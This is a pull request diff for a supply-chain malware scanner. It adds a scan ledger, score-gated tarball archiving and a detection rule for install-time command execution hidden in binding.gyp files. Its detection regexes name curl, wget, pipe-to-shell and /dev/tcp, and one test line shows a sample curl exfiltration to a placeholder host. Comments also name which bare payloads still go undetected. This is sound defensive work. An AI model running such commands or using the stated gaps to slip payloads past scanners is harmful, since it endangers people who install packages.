### PR TITLE
v2.11.67 — audit coverage: archive alert-only + Phantom Gyp + scan ledger

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.66",
+  "version": "2.11.67",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.66",
+      "version": "2.11.67",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.5.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.66",
+  "version": "2.11.67",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/monitor/classify.js
+++ b/src/monitor/classify.js
@@ -73,7 +73,9 @@ const HIGH_CONFIDENCE_MALICE_TYPES = new Set([
   // cap since the attack uses optionalDependencies + prepare hook (no direct lifecycle).
   'env_charcode_reconstruction',           // fromCharCode + process.env[computed] (TeamPCP credential stealer)
   'ide_hook_autoexec',                     // .claude/settings.json SessionStart hook, .vscode/tasks.json folderOpen (Shai-Hulud)
-  'workflow_secrets_dump'                  // toJSON(secrets) in GitHub Actions workflow (Shai-Hulud)
+  'workflow_secrets_dump',                  // toJSON(secrets) in GitHub Actions workflow (Shai-Hulud)
+  // Phantom Gyp 2026-06: binding.gyp command-substitution = install-time RCE, quasi-never legit in benign packages
+  'gyp_command_exec'
 ]);
 
 // Lifecycle compound types that indicate real malicious intent beyond a simple postinstall

--- a/src/monitor/queue.js
+++ b/src/monitor/queue.js
@@ -26,6 +26,7 @@ const {
   cacheTarball,
   updateScanStats,
   appendDetection,
+  appendScanLedger,
   maybePersistDailyStats,
   appendTemporalDetection,
   tarballCacheKey,
@@ -221,6 +222,20 @@ function recordTrainingSample(result, params) {
       sandboxResult: params.sandboxResult || null
     });
     appendTrainingRecord(record);
+    // Phase 0a: per-scan coverage ledger — record this terminal outcome (best-effort;
+    // appendScanLedger swallows its own write errors and never throws).
+    appendScanLedger({
+      name: params.name,
+      version: params.version,
+      ecosystem: params.ecosystem,
+      outcome: params.label || 'clean',
+      score: (result.summary && typeof result.summary.riskScore === 'number') ? result.summary.riskScore : null,
+      tier: params.tier,
+      maxSeverity: result.summary ? result.summary.riskLevel : null,
+      types: [...new Set((result.threats || []).map(t => t.type))],
+      sandbox: params.sandboxResult ? 'run' : 'none',
+      source: 'scan'
+    });
   } catch (err) {
     // Non-fatal: ML export must never crash the monitor
     console.error(`[ML] Failed to record training sample for ${params.name}: ${err.message}`);
@@ -521,6 +536,7 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
             stats.totalTimeMs += Date.now() - startTime;
             stats.clean++;
             updateScanStats('clean');
+            appendScanLedger({ name, version, ecosystem, outcome: 'size_skip', score: 0, source: 'size_skip_quick_clean' });
             return;
           }
         } catch {
@@ -541,6 +557,7 @@ async function scanPackage(name, version, ecosystem, tarballUrl, registryMeta, s
             stats.totalTimeMs += Date.now() - startTime;
             stats.clean++;
             updateScanStats('clean');
+            appendScanLedger({ name, version, ecosystem, outcome: 'size_skip', score: 0, source: 'size_skip_extract_failed' });
             return;
           }
         }

--- a/src/monitor/scan-queue.js
+++ b/src/monitor/scan-queue.js
@@ -32,9 +32,20 @@ let _lastHardDropLog = 0;
 function enqueueScan(scanQueue, item, stats, max = MAX_SCAN_QUEUE) {
   let dropped = false;
   if (scanQueue.length >= max) {
-    scanQueue.shift(); // drop oldest
+    const evicted = scanQueue.shift(); // drop oldest
     dropped = true;
     if (stats) stats.queueHardDrops = (stats.queueHardDrops || 0) + 1;
+    // Phase 0a: record the dropped item so a coverage loss keeps an identity — answers
+    // "which versions were never scanned" (e.g. the Miasma 72s/96-version burst). Lazy
+    // require avoids any top-level coupling with state.js; best-effort, never throws.
+    try {
+      if (evicted && evicted.name) {
+        require('./state.js').appendScanLedger({
+          name: evicted.name, version: evicted.version, ecosystem: evicted.ecosystem,
+          outcome: 'dropped', source: 'queue_cap'
+        });
+      }
+    } catch { /* ledger is best-effort */ }
     const now = Date.now();
     if (now - _lastHardDropLog > HARD_DROP_LOG_INTERVAL_MS) {
       _lastHardDropLog = now;

--- a/src/monitor/state.js
+++ b/src/monitor/state.js
@@ -951,6 +951,114 @@ function _compactDetectionsJsonl() {
   }
 }
 
+// --- Per-scan ledger (Phase 0a: operational coverage observability) ---
+// Append-only record of EVERY package the monitor dequeues + its terminal outcome,
+// so we can distinguish never-scanned vs scanned-clean vs suspect vs dropped and
+// measure TRUE operational coverage (not just rule-TPR on the static corpus).
+// Mirrors the detections JSONL machinery (chunked iterate + periodic compaction).
+// Differences vs detections: (1) NO dedup — every scan event is a distinct record;
+// (2) higher cap + compaction interval since this logs every scan, not just findings.
+const SCAN_LEDGER_FILE = process.env.MUADDIB_SCAN_LEDGER_FILE || path.join(__dirname, '..', '..', 'data', 'scan-ledger.jsonl');
+const MAX_SCAN_LEDGER = (() => {
+  const raw = process.env.MUADDIB_SCAN_LEDGER_MAX;
+  const n = raw ? parseInt(raw, 10) : NaN;
+  return (Number.isFinite(n) && n >= 10 && n <= 5_000_000) ? n : 500_000;
+})();
+const SCAN_LEDGER_COMPACT_INTERVAL = 2000;
+let _scanLedgerAppendedSinceCompact = 0;
+
+// Terminal outcomes a dequeued package can reach. Unknown values normalize to 'clean'
+// so a typo at a call site can never crash the pipeline.
+const SCAN_LEDGER_OUTCOMES = new Set([
+  'clean', 'clean_low_signal', 'clean_tooling', 'suspect', 'ml_clean', 'llm_benign',
+  'sandbox_inconclusive', 'sandbox_unconfirmed', 'confirmed',
+  'static_timeout', 'size_skip', 'dropped'
+]);
+
+/**
+ * Append one per-scan ledger entry recording the terminal outcome of a dequeued
+ * package. Best-effort: NEVER throws (a ledger failure must not break scanning).
+ * No dedup — repeated scans of the same package are intentionally all recorded.
+ *
+ * @param {object} e
+ * @param {string}  e.name        package name (required)
+ * @param {string} [e.version]
+ * @param {string} [e.ecosystem]  'npm' | 'pypi' | ...
+ * @param {string} [e.outcome]    one of SCAN_LEDGER_OUTCOMES (default 'clean')
+ * @param {number} [e.score]      riskScore at the terminal decision
+ * @param {string} [e.tier]       suspect tier ('1a'|'1b'|2|3) if applicable
+ * @param {string} [e.maxSeverity]
+ * @param {string[]} [e.types]    threat types (capped to 12)
+ * @param {string} [e.sandbox]    'none' | 'run' | 'deferred' | 'skip'
+ * @param {boolean} [e.firstPublish]
+ * @param {string} [e.source]     where the record originated ('scan','queue_cap',...)
+ */
+function appendScanLedger(e) {
+  try {
+    if (!e || !e.name) return;
+    const dir = path.dirname(SCAN_LEDGER_FILE);
+    if (!fs.existsSync(dir)) fs.mkdirSync(dir, { recursive: true });
+    const entry = {
+      ts: new Date().toISOString(),
+      name: e.name,
+      version: e.version || null,
+      ecosystem: e.ecosystem || null,
+      outcome: SCAN_LEDGER_OUTCOMES.has(e.outcome) ? e.outcome : 'clean',
+      score: (typeof e.score === 'number') ? e.score : null,
+      tier: (e.tier !== undefined && e.tier !== null) ? String(e.tier) : null,
+      maxSeverity: e.maxSeverity || null,
+      types: Array.isArray(e.types) ? e.types.slice(0, 12) : [],
+      sandbox: e.sandbox || 'none',
+      firstPublish: !!e.firstPublish,
+      source: e.source || 'scan'
+    };
+    fs.appendFileSync(SCAN_LEDGER_FILE, JSON.stringify(entry) + '\n', 'utf8');
+    _scanLedgerAppendedSinceCompact++;
+    if (_scanLedgerAppendedSinceCompact >= SCAN_LEDGER_COMPACT_INTERVAL) {
+      _scanLedgerAppendedSinceCompact = 0;
+      _compactScanLedgerJsonl();
+    }
+  } catch (err) {
+    if (err.code === 'EROFS' || err.code === 'EACCES' || err.code === 'EPERM') return;
+    if (err.code === 'ENOSPC') {
+      console.warn('[MONITOR] WARNING: disk full (ENOSPC) — cannot persist scan-ledger.');
+      return;
+    }
+    console.error(`[MONITOR] Failed to write scan-ledger: ${err.message}`);
+  }
+}
+
+/**
+ * Compact the scan-ledger JSONL: keep only the most recent MAX_SCAN_LEDGER entries.
+ * No-op when already under cap. Streams (never loads the whole file at once).
+ */
+function _compactScanLedgerJsonl() {
+  try {
+    const total = _countJsonlLines(SCAN_LEDGER_FILE);
+    if (total <= MAX_SCAN_LEDGER) return;
+    const toDrop = total - MAX_SCAN_LEDGER;
+    let skipped = 0;
+    const kept = [];
+    _iterateJsonlSync(SCAN_LEDGER_FILE, (entry) => {
+      if (skipped < toDrop) { skipped++; return; }
+      kept.push(JSON.stringify(entry));
+    });
+    const tmpFile = SCAN_LEDGER_FILE + '.tmp';
+    fs.writeFileSync(tmpFile, kept.length ? kept.join('\n') + '\n' : '', 'utf8');
+    fs.renameSync(tmpFile, SCAN_LEDGER_FILE);
+    console.log(`[MONITOR] COMPACT scan-ledger: ${total} -> ${kept.length} entries`);
+  } catch (err) {
+    console.error(`[MONITOR] Scan-ledger compaction failed: ${err.message}`);
+  }
+}
+
+/** Stream the scan-ledger into an array (tests + Phase 0b rollup). */
+function loadScanLedger() {
+  const entries = [];
+  try { _iterateJsonlSync(SCAN_LEDGER_FILE, (e) => { entries.push(e); }); } catch { /* ignore */ }
+  return entries;
+}
+
 // --- Scan stats (FP rate tracking) ---
 
 function loadScanStats() {
@@ -1420,6 +1528,8 @@ module.exports = {
   MAX_TEMPORAL_DETECTIONS,
   MAX_DAILY_ALERTS,
   DETECTION_COMPACT_INTERVAL,
+  SCAN_LEDGER_FILE,
+  MAX_SCAN_LEDGER,
 
   // Mutable state getters/setters
   getScanMemoryCache,
@@ -1456,6 +1566,9 @@ module.exports = {
   appendAlert,
   loadDetections,
   appendDetection,
+  appendScanLedger,
+  loadScanLedger,
+  _compactScanLedgerJsonl,
   getDetectionStats,
   runStateMigrations,
   // Internal — exported for tests and for the daemon hourly housekeeping.

--- a/src/monitor/tarball-archive.js
+++ b/src/monitor/tarball-archive.js
@@ -45,6 +45,18 @@ function getMinFreeBytes() {
   return gb * 1024 * 1024 * 1024;
 }
 
+// Tarball download is gated on this score so the heavy .tgz is kept ONLY for
+// alert-threshold packages; the cheap JSON metadata is still written for every
+// suspect. Aligns with the webhook alert floor (20). Bounded to [0, 100], default 20.
+const DEFAULT_TGZ_MIN_SCORE = 20;
+function getArchiveTgzMinScore() {
+  const raw = process.env.MUADDIB_ARCHIVE_TGZ_MIN_SCORE;
+  if (raw === undefined || raw === '') return DEFAULT_TGZ_MIN_SCORE;
+  const n = parseInt(raw, 10);
+  if (!Number.isFinite(n) || n < 0 || n > 100) return DEFAULT_TGZ_MIN_SCORE;
+  return n;
+}
+
 function hasEnoughSpace(targetDir) {
   try {
     if (typeof fs.statfsSync !== 'function') return true; // Node <18.15 — fail-open
@@ -109,13 +121,19 @@ async function archiveSuspectTarball(packageName, version, tarballUrl, scanResul
 
   // Defense-in-depth: never archive packages that are statically clean.
   // Callers in the pipeline already gate on tier 1a/1b/2 classification, but a
-  // numeric score of 0 with no triggered rules is unambiguously CLEAN — those
-  // dominated archive volume in production.
+  // numeric score of 0 with no triggered rules is unambiguously CLEAN.
   const score = (scanResult && typeof scanResult.score === 'number') ? scanResult.score : 0;
   const rules = (scanResult && Array.isArray(scanResult.rulesTriggered)) ? scanResult.rulesTriggered : [];
   if (score === 0 && rules.length === 0) {
     return false;
   }
+
+  // Tarballs dominate archive volume (~439MB/day of .tgz vs ~3.6MB/day of JSON).
+  // Keep the cheap JSON metadata for EVERY suspect (audit trail + GT-promotion index),
+  // but download/retain the heavy .tgz ONLY for packages at/above the alert threshold
+  // (score >= MUADDIB_ARCHIVE_TGZ_MIN_SCORE, default 20 = webhook floor). This shrinks
+  // the archive from tens of GB to hundreds of MB without losing the record of what was seen.
+  const keepTarball = score >= getArchiveTgzMinScore();
 
   const dateStr = getArchiveDateString();
   const dayDir = path.join(ARCHIVE_DIR, dateStr);
@@ -124,32 +142,55 @@ async function archiveSuspectTarball(packageName, version, tarballUrl, scanResul
   const tgzPath = path.join(dayDir, `${basename}.tgz`);
   const jsonPath = path.join(dayDir, `${basename}.json`);
 
-  // Dedup: skip if already archived
-  if (fs.existsSync(tgzPath)) {
-    return false;
+  // At/above the alert threshold: archive the full .tgz (existing behavior, unchanged).
+  // Below it: keep only the cheap JSON metadata (audit trail + GT-promotion index).
+  if (keepTarball) {
+    // Dedup: skip if already archived
+    if (fs.existsSync(tgzPath)) {
+      return false;
+    }
+
+    // Disk-space gate: don't let a burst of suspects run the volume to 100% between
+    // the periodic cleanups. Guards the heavy .tgz download.
+    if (!hasEnoughSpace(ARCHIVE_DIR)) {
+      console.warn(`[Archive] Skip ${packageName}@${version}: free space below ${DEFAULT_MIN_FREE_GB}GB threshold`);
+      return false;
+    }
+
+    // Ensure day directory exists
+    fs.mkdirSync(dayDir, { recursive: true });
+
+    // Download with semaphore (shares concurrency with rest of pipeline). Download
+    // errors propagate to the fire-and-forget .catch() in the caller (queue.js).
+    await acquireRegistrySlot();
+    try {
+      await downloadToFile(tarballUrl, tgzPath, ARCHIVE_TIMEOUT_MS);
+    } finally {
+      releaseRegistrySlot();
+    }
+
+    const tarballSha256 = sha256File(tgzPath);
+    const metadata = {
+      package: packageName,
+      version,
+      timestamp: new Date().toISOString(),
+      score: scanResult.score || 0,
+      priority: scanResult.priority || null,
+      rules_triggered: scanResult.rulesTriggered || [],
+      llm_verdict: scanResult.llmVerdict || null,
+      tarball_archived: true,
+      tarball_sha256: tarballSha256
+    };
+    fs.writeFileSync(jsonPath, JSON.stringify(metadata, null, 2));
+    return true;
   }
 
-  // Defense layer 3: skip if disk is nearly full, even if retention is well-configured.
-  // Prevents a burst of malicious campaigns from blowing past the 7-day budget
-  // before the 6h periodic cleanup tick can catch up.
-  if (!hasEnoughSpace(ARCHIVE_DIR)) {
-    console.warn(`[Archive] Skip ${packageName}@${version}: free space below ${DEFAULT_MIN_FREE_GB}GB threshold`);
+  // Below the alert threshold — record cheap JSON metadata only, skip the tarball.
+  // Dedup on the JSON record so re-scans of the same package@version don't rewrite it.
+  if (fs.existsSync(jsonPath)) {
     return false;
   }
-
-  // Ensure day directory exists
   fs.mkdirSync(dayDir, { recursive: true });
-
-  // Download with semaphore (shares concurrency with rest of pipeline)
-  await acquireRegistrySlot();
-  try {
-    await downloadToFile(tarballUrl, tgzPath, ARCHIVE_TIMEOUT_MS);
-  } finally {
-    releaseRegistrySlot();
-  }
-
-  // Compute hash and write metadata
-  const tarballSha256 = sha256File(tgzPath);
   const metadata = {
     package: packageName,
     version,
@@ -158,9 +199,9 @@ async function archiveSuspectTarball(packageName, version, tarballUrl, scanResul
     priority: scanResult.priority || null,
     rules_triggered: scanResult.rulesTriggered || [],
     llm_verdict: scanResult.llmVerdict || null,
-    tarball_sha256: tarballSha256
+    tarball_archived: false,
+    tarball_sha256: null
   };
-
   fs.writeFileSync(jsonPath, JSON.stringify(metadata, null, 2));
   return true;
 }
@@ -272,5 +313,6 @@ module.exports = {
   getArchiveDateString,
   getRetentionDays,
   getMinFreeBytes,
+  getArchiveTgzMinScore,
   parseArchiveDayDir
 };

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -1001,6 +1001,10 @@ const PLAYBOOKS = {
     'HAUTE: binding.gyp avec script lifecycle non-standard. Code natif compile a l\'installation. ' +
     'Verifier le contenu de binding.gyp et les sources C/C++. Installer avec --ignore-scripts si suspect.',
 
+  gyp_command_exec:
+    'CRITIQUE: binding.gyp utilise la command-substitution GYP <!(...) / <!@(...) — execution de code a l\'installation via node-gyp, sans script lifecycle (pattern Phantom Gyp). ' +
+    'Decoder la commande substituee. NE PAS installer : node-gyp l\'execute au build meme avec --ignore-scripts. Verifier la source officielle du package.',
+
   string_mutation_obfuscation:
     'HAUTE: Chaine de .replace() reconstruisant des noms d\'API dangereuses (leet-speak). ' +
     'Technique d\'evasion par substitution de caracteres. Decoder la chaine finale. Supprimer si malveillant.',

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -2949,6 +2949,19 @@ const RULES = {
     ],
     mitre: 'T1195.002'
   },
+  gyp_command_exec: {
+    id: 'MUADDIB-PKG-023',
+    name: 'GYP Command-Substitution Install Execution',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'binding.gyp utilise la command-substitution GYP <!(...) / <!@(...) — execution de code a l\'installation via node-gyp, sans script lifecycle package.json (pattern Phantom Gyp, juin 2026).',
+    references: [
+      'https://gyp.gsrc.io/docs/InputFormatReference.md',
+      'https://attack.mitre.org/techniques/T1195.002/'
+    ],
+    mitre: 'T1195.002'
+  },
   string_mutation_obfuscation: {
     id: 'MUADDIB-AST-074',
     name: 'String Mutation Obfuscation',

--- a/src/scanner/package.js
+++ b/src/scanner/package.js
@@ -258,19 +258,26 @@ async function scanPackageJson(targetPath) {
     // check below. Distinct from <(...) / <@(...) (plain variable expansion, benign) which MUST
     // NOT fire — the required `!` gates command execution.
     //
-    // Exempt the legitimate header-locate idiom real native addons use via <!(...) (e.g.
-    // node -p "require('node-addon-api').include", nan, pkg-config, node-gyp). Flag a
-    // command-sub only when its body is NOT a pure build-tool lookup OR contains shell
-    // chaining/fetch — so an attacker can't hide `node index.js && curl evil` behind a token.
-    const GYP_BUILD_TOOL = /node-addon-api|require\(['"]nan['"]\)|pkg-config|node-gyp|napi/i;
-    const GYP_SHELL_CHAIN = /[;&|`]|\$\(|>\s|>>|\bcurl\b|\bwget\b|\bbash\b|\bsh\b/i;
+    // binding.gyp command-substitution runs a command at *configure* time via node-gyp (no
+    // package.json lifecycle needed). But legit native addons use <!(...) heavily for build-env
+    // queries — `node -p process.versions...`, `node ./util/has_lib.js`, `pkg-config ... | sed`,
+    // `node -p "require('node-addon-api').include"` — and a build-helper `<!(node x.js)` is
+    // statically INDISTINGUISHABLE from a payload `<!(node index.js)`. To honor "FPR must never
+    // increase" we flag ONLY command-subs carrying a malice-specific marker, never the bare
+    // "runs a script" shape:
+    //   - Phantom Gyp's fake-source trick: run something then `; / && / | echo <name>.c` (return
+    //     a fabricated C/C++/ObjC source so node-gyp doesn't error) — quasi-never legit;
+    //   - network fetch (curl/wget), pipe-to-shell (| sh, sh -c), eval/base64//dev/tcp, char-code
+    //     obfuscation (fromCharCode/atob).
+    // Honest limitation: a bare `<!(node payload.js)` with NO marker is not flagged — it cannot be
+    // distinguished from canvas/node-sass build helpers without false positives (validated: bcrypt
+    // `node -p process.versions`, canvas `node ./util/has_lib.js`, `pkg-config | sed` all clean).
+    const GYP_DANGER = /[;&|]\s*echo\s+[^|;&]*\.(?:c|cc|cpp|cxx|m|mm|cs)\b|\bcurl\b|\bwget\b|\|\s*(?:sh|bash|zsh)\b|\b(?:sh|bash|zsh)\s+-c\b|\beval\b|\bbase64\b|\/dev\/tcp|fromCharCode|\batob\b/i;
     let gypCommandExec = false;
-    const gypCmdSubRe = /<!@?\(([^\n]{0,200})/g;
+    const gypCmdSubRe = /<!@?\(([^\n]{0,400})/g;
     let _gm;
     while ((_gm = gypCmdSubRe.exec(gypContent)) !== null) {
-      const body = _gm[1];
-      const benign = GYP_BUILD_TOOL.test(body) && !GYP_SHELL_CHAIN.test(body);
-      if (!benign) { gypCommandExec = true; break; }
+      if (GYP_DANGER.test(_gm[1])) { gypCommandExec = true; break; }
     }
     if (gypCommandExec) {
       threats.push({

--- a/src/scanner/package.js
+++ b/src/scanner/package.js
@@ -252,6 +252,35 @@ async function scanPackageJson(targetPath) {
     // Check if binding.gyp references C/C++ source files
     const hasNativeSources = /\.(c|cc|cpp|cxx|h|hpp)\b/.test(gypContent);
 
+    // Phantom Gyp (June 2026): GYP command-substitution <!(...) / <!@(...) runs a command at
+    // *configure* time via `node-gyp`, which npm auto-runs on install whenever a binding.gyp is
+    // present — NO package.json lifecycle script required, so it slips past every lifecycle-gated
+    // check below. Distinct from <(...) / <@(...) (plain variable expansion, benign) which MUST
+    // NOT fire — the required `!` gates command execution.
+    //
+    // Exempt the legitimate header-locate idiom real native addons use via <!(...) (e.g.
+    // node -p "require('node-addon-api').include", nan, pkg-config, node-gyp). Flag a
+    // command-sub only when its body is NOT a pure build-tool lookup OR contains shell
+    // chaining/fetch — so an attacker can't hide `node index.js && curl evil` behind a token.
+    const GYP_BUILD_TOOL = /node-addon-api|require\(['"]nan['"]\)|pkg-config|node-gyp|napi/i;
+    const GYP_SHELL_CHAIN = /[;&|`]|\$\(|>\s|>>|\bcurl\b|\bwget\b|\bbash\b|\bsh\b/i;
+    let gypCommandExec = false;
+    const gypCmdSubRe = /<!@?\(([^\n]{0,200})/g;
+    let _gm;
+    while ((_gm = gypCmdSubRe.exec(gypContent)) !== null) {
+      const body = _gm[1];
+      const benign = GYP_BUILD_TOOL.test(body) && !GYP_SHELL_CHAIN.test(body);
+      if (!benign) { gypCommandExec = true; break; }
+    }
+    if (gypCommandExec) {
+      threats.push({
+        type: 'gyp_command_exec',
+        severity: 'CRITICAL',
+        message: `binding.gyp uses GYP command-substitution (<!(...) / <!@(...)) running a non-build command at install time via node-gyp, no lifecycle script required (Phantom Gyp pattern).`,
+        file: 'binding.gyp'
+      });
+    }
+
     if (hasShellActions) {
       threats.push({
         type: 'native_addon_install',

--- a/src/scanner/package.js
+++ b/src/scanner/package.js
@@ -258,26 +258,35 @@ async function scanPackageJson(targetPath) {
     // check below. Distinct from <(...) / <@(...) (plain variable expansion, benign) which MUST
     // NOT fire — the required `!` gates command execution.
     //
-    // binding.gyp command-substitution runs a command at *configure* time via node-gyp (no
-    // package.json lifecycle needed). But legit native addons use <!(...) heavily for build-env
-    // queries — `node -p process.versions...`, `node ./util/has_lib.js`, `pkg-config ... | sed`,
-    // `node -p "require('node-addon-api').include"` — and a build-helper `<!(node x.js)` is
-    // statically INDISTINGUISHABLE from a payload `<!(node index.js)`. To honor "FPR must never
-    // increase" we flag ONLY command-subs carrying a malice-specific marker, never the bare
-    // "runs a script" shape:
-    //   - Phantom Gyp's fake-source trick: run something then `; / && / | echo <name>.c` (return
-    //     a fabricated C/C++/ObjC source so node-gyp doesn't error) — quasi-never legit;
-    //   - network fetch (curl/wget), pipe-to-shell (| sh, sh -c), eval/base64//dev/tcp, char-code
-    //     obfuscation (fromCharCode/atob).
-    // Honest limitation: a bare `<!(node payload.js)` with NO marker is not flagged — it cannot be
-    // distinguished from canvas/node-sass build helpers without false positives (validated: bcrypt
-    // `node -p process.versions`, canvas `node ./util/has_lib.js`, `pkg-config | sed` all clean).
+    // Legit native addons use <!(...) heavily for build-env queries — `node -p process.versions`,
+    // `node ./util/has_lib.js`, `pkg-config ... | sed`, `node -p "require('node-addon-api').include"`
+    // — and a build-helper `<!(node x.js)` is statically INDISTINGUISHABLE from a payload
+    // `<!(node index.js)`. To honor "FPR must never increase" we flag a command-sub ONLY when it
+    // carries a malice-specific marker, never the bare "runs a script" shape:
+    //   (1) GYP_DANGER — shell-level malice in the command line itself: the Phantom Gyp fake-source
+    //       trick (`; / && / | echo <name>.c`, returning a fabricated source so node-gyp doesn't
+    //       error), network fetch (curl/wget), pipe-to-shell (| sh, sh -c), eval/base64//dev/tcp,
+    //       char-code obfuscation (fromCharCode/atob);
+    //   (2) an inline interpreter payload — node|python|ruby|perl running -e/-c/-p/--eval/--print code
+    //       that reaches the NETWORK (require/import of https|http|net|dgram|dns|tls, optional node:
+    //       prefix; fetch; urllib/requests/httpx/http.client/urlopen; socket). Network at configure
+    //       time is never a legit build query. We deliberately do NOT key on child_process/exec/spawn
+    //       here — legit addons shell out to detect the toolchain (`node -e "...execSync('gcc
+    //       --version')..."`), which would FP; an exec of curl/wget is still caught by GYP_DANGER.
+    //       Catches `<!(node --eval require('node:https')...)`, `<!(python3 -c import requests)`.
+    // Honest limitation: this is a line-by-line SPEED-BUMP, not coverage. A bare `<!(node payload.js)`
+    // and any non-network inline payload are NOT flagged (indistinguishable from canvas/node-sass
+    // build helpers without false positives, FPR-first by design). Real closure needs a compound
+    // (configure-time sink × the run script's AST/dataflow verdict) — a separate effort.
     const GYP_DANGER = /[;&|]\s*echo\s+[^|;&]*\.(?:c|cc|cpp|cxx|m|mm|cs)\b|\bcurl\b|\bwget\b|\|\s*(?:sh|bash|zsh)\b|\b(?:sh|bash|zsh)\s+-c\b|\beval\b|\bbase64\b|\/dev\/tcp|fromCharCode|\batob\b/i;
+    const GYP_INTERP = /\b(?:node|nodejs|python[0-9.]*|ruby|perl)\b[^|;&\n]{0,40}?\s--?(?:eval|print|e|c|p)\b/i;
+    const GYP_PAYLOAD_API = /(?:require|import)\s*\(\s*['"](?:node:)?(?:https?|net|dgram|dns|tls)['"]|\bfetch\s*\(|\burllib\b|\brequests\b|\bhttpx\b|http\.client|\burlopen\b|socket\.(?:socket|create_connection)/i;
     let gypCommandExec = false;
     const gypCmdSubRe = /<!@?\(([^\n]{0,400})/g;
     let _gm;
     while ((_gm = gypCmdSubRe.exec(gypContent)) !== null) {
-      if (GYP_DANGER.test(_gm[1])) { gypCommandExec = true; break; }
+      const body = _gm[1];
+      if (GYP_DANGER.test(body) || (GYP_INTERP.test(body) && GYP_PAYLOAD_API.test(body))) { gypCommandExec = true; break; }
     }
     if (gypCommandExec) {
       threats.push({

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -130,7 +130,9 @@ const PACKAGE_LEVEL_TYPES = new Set([
   // audit DF-C1: emitted when MAX_GRAPH_NODES exceeded so cross-file blind spot is visible in scoring
   'large_package_graph_truncated',
   // audit MR-C1: informational signal that the scan target is a monorepo root (per-workspace scoring TBD)
-  'monorepo_detected'
+  'monorepo_detected',
+  // Phantom Gyp: binding.gyp command-substitution is a package-level (manifest) finding
+  'gyp_command_exec'
 ]);
 
 // ============================================

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 262 (257 RULES + 5 PARANOID, Track D +3 rules)', () => {
+  test('v8b: rule count is 263 (258 RULES + 5 PARANOID, Track D +3, gyp_command_exec +1)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 257, `Expected 257 RULES, got ${ruleCount}`);
+    assert(ruleCount === 258, `Expected 258 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/monitor.test.js
+++ b/tests/integration/monitor.test.js
@@ -6996,9 +6996,9 @@ async function runMonitorTests() {
 
   // ===== v2.7.6 C1: High-confidence malice bypass =====
 
-  test('MONITOR: HIGH_CONFIDENCE_MALICE_TYPES contains 28 threat types', () => {
-    assert(HIGH_CONFIDENCE_MALICE_TYPES.size === 28,
-      `Should have 28 types, got ${HIGH_CONFIDENCE_MALICE_TYPES.size}`);
+  test('MONITOR: HIGH_CONFIDENCE_MALICE_TYPES contains 29 threat types', () => {
+    assert(HIGH_CONFIDENCE_MALICE_TYPES.size === 29,
+      `Should have 29 types, got ${HIGH_CONFIDENCE_MALICE_TYPES.size}`);
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('lifecycle_shell_pipe'), 'Missing lifecycle_shell_pipe');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('fetch_decrypt_exec'), 'Missing fetch_decrypt_exec');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('download_exec_binary'), 'Missing download_exec_binary');

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,12 +157,12 @@ jobs:
     }
   });
 
-  // 3.3b Rule count check (Track D: linux_fingerprint_exec + direct_ip_exfil + recon_exfil_direct_ip → 257 RULES)
-  test('P3: rule count is 262 (257 RULES + 5 PARANOID)', () => {
+  // 3.3b Rule count check (Track D +3, then gyp_command_exec MUADDIB-PKG-023 +1 → 258 RULES)
+  test('P3: rule count is 263 (258 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 257, `Expected 257 RULES, got ${ruleCount}`);
+    assert(ruleCount === 258, `Expected 258 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/run-tests.js
+++ b/tests/run-tests.js
@@ -82,6 +82,7 @@ const { runCompoundTighteningTests } = require('./unit/compound-tightening.test'
 const { runStagedRemoteLoaderTests } = require('./unit/staged-remote-loader.test');
 const { runLlmDetectiveTests } = require('./unit/llm-detective.test');
 const { runTarballArchiveTests } = require('./unit/tarball-archive.test');
+const { runScanLedgerTests } = require('./unit/scan-ledger.test');
 const { runSandboxPreloadTests } = require('./integration/sandbox-preload.test');
 
 // Integration tests (fast subset — CLI, monitor, diff)
@@ -322,6 +323,7 @@ async function timed(name, fn) {
 
   // Tarball archive tests
   await timed('tarball-archive', runTarballArchiveTests);
+  await timed('scan-ledger', runScanLedgerTests);
 
   // ML pipeline integration tests (v2.10.0)
   await timed('ml-pipeline', runMLPipelineTests);

--- a/tests/scanner/package.test.js
+++ b/tests/scanner/package.test.js
@@ -143,6 +143,56 @@ async function runPackageTests() {
     } finally { cleanupTemp(tmp); }
   });
 
+  await asyncTest('PACKAGE: build-tool with || fallback → NO gyp_command_exec (single-| FP regression)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-gyp-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'addon-fallback', version: '1.0.0', scripts: { install: 'node-gyp rebuild' } }));
